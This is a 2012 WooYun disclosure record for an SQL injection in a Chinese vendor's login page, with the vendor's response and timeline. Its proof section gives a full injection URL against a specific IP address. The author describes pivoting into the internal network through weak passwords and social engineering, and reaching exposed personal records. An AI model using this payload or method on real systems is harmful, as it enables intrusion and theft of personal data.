漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-010181
漏洞标题:亚太宏图sql注入漏洞导致整个内网沦陷
相关厂商:亚太宏图
漏洞作者: sql
提交时间:2012-07-26 18:08
修复时间:2012-09-09 18:08
公开时间:2012-09-09 18:08
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-07-26: 细节已通知厂商并且等待厂商处理中
2012-07-30: 厂商已经确认,细节仅向厂商公开
2012-08-09: 细节向核心白帽子及相关领域专家公开
2012-08-19: 细节向普通白帽子公开
2012-08-29: 细节向实习白帽子公开
2012-09-09: 细节向公众公开
简要描述:
后台登陆框 用户名没有做好过滤,导致sql注入的产生。数据库权限为sa.
敏感资料很多,还有 某石油勘探总院的 很多敏感资料 全部的身份证 真实姓名 单位 等等上千条。
详细说明:
sqlserver2005 降权了,sa是network 权限。 所以虽然是sa 但也不是秒日的,web目录不好找。反正后来日进去了,内网大都有弱口令 或者收集信息后社工都可以日。
敏感资料很多,还有 某石油勘探总院的 很多敏感资料 全部的身份证 真实姓名 单位 等等上千条。
漏洞证明:
http://218.241.82.76:809/login.aspx?__VIEWSTATE=%2FwEPDwUJNDIwODM5NjI3ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUOSW1hZ2VCdXR0b25hZGQFEUltYWdlQnV0dG9uY2FuY2VsdHEjS1OOsRe7DTl1ii%2Fn0YINLuk%3D&PassWord=11&__EVENTVALIDATION=%2FwEWBQLk0oDzDAKvruq2CAKyxeCRDwK5qL%2BRCQLt%2FIb7DKvt6QxwNqi5acAbk3TdJYzxFedG&ImageButtonadd.x=47&ImageButtonadd.y=13&UserName=admin'%20and%201=@@version%20and%20'a'='a
修复方案:
都喜欢说:你比我懂,我也说。
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2012-07-30 20:06
厂商回复:
CNVD确认并复现部分所述情况,由CNVD直接联系涉事单位处置。
按完全影响机密性,部分影响完整性进行评分,rank=8.47*1.0*1.1=9.317
最新状态:
暂无